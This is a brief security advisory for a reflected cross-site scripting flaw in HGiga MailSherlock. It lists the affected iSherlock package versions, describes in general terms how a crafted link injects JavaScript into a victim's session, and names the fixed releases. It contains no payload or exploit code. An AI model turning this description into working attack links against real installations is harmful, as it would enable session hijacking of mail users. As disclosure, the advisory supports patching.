HGiga MailSherlock - Reflected XSS

Vulnerability

HGiga MailSherlock's specific function fails to properly filter special characters in URL parameters, allowing an attacker to inject arbitrary JavaScript. The vulnerability affects MailSherlock system version v4.5 with system packages iSherlock-user-4.5 versions up to and including 4.5-161 and iSherlock-antispam-4.5 versions up to and including 4.5-167 [1].

Exploitation

An unauthenticated remote attacker can craft a malicious URL containing JavaScript in a parameter. The attacker must trick a victim into clicking the link (user interaction). No authentication or special network position is required. When the victim accesses the URL, the injected script executes in the context of the victim's browser session [1].

Impact

Successful exploitation results in reflected cross-site scripting (XSS). The attacker can execute arbitrary JavaScript in the victim's browser, potentially leading to session hijacking, defacement, or redirection to malicious sites. The impact is limited to the victim's browser session and does not directly compromise the server [1].

Mitigation

HGiga has released fixed versions: update iSherlock-user to version 4.5-162.386.rpm and iSherlock-antispam to version 4.5-168.386.rpm [1]. No workarounds are documented. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.